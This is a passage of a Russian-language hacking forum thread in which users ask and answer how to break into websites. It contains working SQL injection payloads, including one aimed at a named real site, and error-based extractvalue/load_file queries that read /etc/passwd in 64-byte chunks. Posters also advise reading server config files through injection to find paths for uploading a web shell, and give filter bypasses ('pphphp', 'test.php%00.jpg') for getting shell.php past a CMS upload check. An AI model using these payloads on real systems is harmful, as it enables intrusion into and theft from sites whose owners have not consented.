Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Потому что там нет information_schema по этому и ошибка
     
    _________________________
  2. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    А куда-же она делась, не подскажите?
    Наверное её админы удалили, да?
     
  3. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Можно ли залить шелл незнаю полного пути?
     
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    нельзя
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    нет....
     
  6. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    можно ли узнать путь через иньку?
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну если в ошибке путь..но он не всегда соответсвует реальности..и еще если у тебя права файл_прив, то прочитай файлы конфигурации на сервере.. найдешь там и путь..
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Нашел на одном сайте блинд такого вида

    http://www.site.com?id=8'+and+ascii(substring((database()),7,1))=118+and+'x'='x

    пятая ветка мускула

    не могу подобрать прогу для ее раскрутки

    если можно дайте ссылку , на скрипт и прогу которой можно ее раскрутить
     
  9. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.biostar-russia.ru/app/ru/vga/series.php?S_ID=-55+/*!union*/+/*!select*/+1+--+
    не получается подобрать кол-во колонок..
    кроме еррор-базе никак?
     
  10. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    ммм

    можно ссылку именно на то что ты сказал
     
    #19450 Revi, 24 Feb 2012
    Last edited by a moderator: 24 Feb 2012
  11. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    короче просто ищи файл phpinfo
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    phpinfo.php не всегда есть а вот httpd.conf всегда
     
  13. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    вв

    вопрос как его просто искать в папках или через иньку открыть?
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    через иньекцию читай...
     
  15. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    пытаюсь выполнить код
    2'AND(extractvalue(1,concat(0x3a,(select(load_file(0x2F6574632F706173737764))))))!='21312
    почему то читает только первую строчку их файла. Как читать последующие строчки?
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Error-based выводит 64 байт. Юзай mid().
    2'AND(extractvalue(1,concat(0x3a,(select(mid(load_file(0x2F6574632F706173737764),1,64))))))!='21312
    Начинает с первого читает до 64-символа.
     
  17. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    Code:
    			// проверяем тип файла
    			$types 		= $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
    			$types 		= str_replace('php', '', $types);
    			$types 		= str_replace('htm', '', $types);
    			$types 		= str_replace('htaccess', '', $types);
    			$maytypes 	= explode(',', str_replace(' ', '', $types));  
    			$path_parts = pathinfo($name);
    			// расширение файла
    			$ext        = strtolower($path_parts['extension']);
    			// флаг существования расширения в разрешенных
    			$may        = in_array($ext, $maytypes);
    			if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }
    
    Как можно обойти проверку расширений? :confused:
     
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2alexvrn,
    врядли обойдешь.
     
    1 person likes this.
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Прозреваю, что переменная $cfg['filestype'] может задаваться где-то в конфигах, поэтому если есть возможность ее установить, то пропиши подобное

    $cfg['filestype'] = 'jpeg,gif,png,jpg,bmp,zip,rar,pphphp';


    и залей shell.php
     
    1 person likes this.
  20. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя:
    Code:
    test.php%00.jpg
    
    Code:
    Array
    (
        [dirname] => .
        [basename] => test.php�.jpg
        [extension] => jpg
        [filename] => test.php
    )
    
     
Thread Status:
Not open for further replies.